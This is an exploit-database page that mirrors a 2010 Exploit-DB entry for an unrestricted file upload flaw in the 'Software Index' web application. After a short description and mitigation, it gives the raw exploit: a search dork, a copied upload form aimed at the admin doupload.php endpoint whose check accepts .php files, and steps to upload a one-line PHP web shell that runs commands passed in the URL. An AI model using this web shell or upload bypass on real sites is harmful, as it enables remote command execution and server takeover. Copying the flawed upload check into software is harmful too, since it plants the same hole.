Up - exploit.company

vendor:

Software Index

by:

indoushka

7,5

CVSS

HIGH

File Upload Vulnerability

434

CWE

Product Name: Software Index

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

Up

A file upload vulnerability is a vulnerability that allows an attacker to upload malicious files to a web application. This vulnerability exists in the form of an input field in the web application that allows users to upload files from their local machine to the web server. In this case, the vulnerable web application is http://www.p30vel.ir/Software-Index-P30vel.ir/siteadmin/doupload.php, which allows users to upload files with the extensions .php, .png, .bmp, .jpeg, and .gif. An attacker can exploit this vulnerability by uploading a malicious file to the web server, which can then be used to execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, the web application should only allow users to upload files with specific extensions, and should also validate the file type and content before allowing it to be uploaded. Additionally, the web application should also restrict the size of the file that can be uploaded.

Source

Exploit-DB raw data:

######################################################################## 

# Vendor: http://www.p30vel.ir/

# Date: 2010-05-27 

# Author : indoushka 

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 

# Contact : indoushka@hotmail.com 

# Home :

# Bug  : Up

# Tested on : windows SP2 Français V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                               
# Dork : Copyright 2010. Software Index       
                                                                 
# Exploit By indoushka 

	<html>
<head>
<Title>Select Image File for uploading</Title>

<script language="JavaScript">
function checkFile()
{
if (form1.userfile.value == "")
{
alert(" Please choose a file to upload");
return (false);
}
if (form1.userfile.value.indexOf(".php") == -1 &&form1.userfile.value.indexOf(".png") == -1 &&form1.userfile.value.indexOf(".bmp") == -1 &&form1.userfile.value.indexOf(".jpeg") == -1 && form1.userfile.value.indexOf(".gif") == -1)
{
alert(" Please upload .gif/.jpg/.jpeg/.bmp/.png files only");
form1.userfile.value="";
form1.userfile.focus();
return (false);
}
return(true);
}

</script>


</head>

<body>
<b><font size="3">Upload Image</font>.</b> 
<FORM ENCTYPE="multipart/form-data" ACTION="http://127.0.0.1/Software-Index-P30vel.ir/siteadmin/doupload.php?box=<?php echo $_REQUEST["box"]?>&func=2" METHOD=post ID=form1 NAME=form1 onSubmit="javscript:return checkFile(form1);"> 
<input type="hidden" name="id" value="<?php echo $_SESSION[ "username" ] ?>">
<input type="hidden" name="act" value="upload">
<table><tr><td>
<b><font size="3" color="#FFFFFF"><u><font color="#000000" size="2">Attachment</font></u></font></b> 
        <table>
          <tr> 
            <td valign="top" width="15"><font color="#000000">1.</font></td>
            <td width="470"><font color="#000000">To add an Attachment, click 
              the 'Browse' button to select the file to attach, or type the path 
              to the file in the Text-box below.</font></td>
          </tr>
          <tr> 
            <td valign="top" width="15"><font color="#000000">2.</font></td>
            <td width="470"><font color="#000000">Then click Upload button to 
              complete the upload</font></td>
          </tr>
          <tr> 
            <td valign="top" width="15"><font color="#000000">3.</font></td>
            <td width="470"><font color="#990000">NOTE</font><font color="#000000">: 
              The File transfer can take from a few seconds upto a few minutes 
              depending on the size of the attachment. Please be patient while 
              the attachment is being uploaded.</font></td>
          </tr>
          <tr> 
            <td valign="top" width="15"><font color="#000000">4.</font></td>
            <td width="470"><font color="#990000">NOTE</font><font color="#000000">: 
              The File will be renamed if the file with the same name is present</font></td>
          </tr>
        </table>
      </TD>
    </TR> 
<TR><TD><STRONG>Hit the [Browse] button to find the file on your computer.</STRONG><BR></TD></TR> 
<TR><TD><strong>Image</strong>
<INPUT NAME=userfile SIZE=30 TYPE=file   MaxFileSize="1000000"> 
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
  </TD></TR>
  <TR><TD> </TD></TR>
  <TR><TD><input type="submit" value="Upload" name="uploadfile"></TD></TR>
<TR><TD>NOTE: Please be patient, you will not receive any notification until the 
file is completely transferred.<BR><BR></TD></TR>
</table>

</FORM>

   
<!--
<Script Language="JavaScript">
function listattach(filename)
{
window.opener.document.form123.<?php //request.QueryString("box") ?>.value=filename
window.close()
}
</script>
<Input type=button value=Done onClick="listattach('<?php //echo filename ?>')">
-->

</body>

</html>

1 - Save as php or html and upload to your localhost or server 

2 - use Backdoor 

<?php
$cmd = $_GET['cmd'];
system($cmd);
?>

3 - you see where the file uploaded

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ
---------------------------------------------------------------------------------------------------------------------------------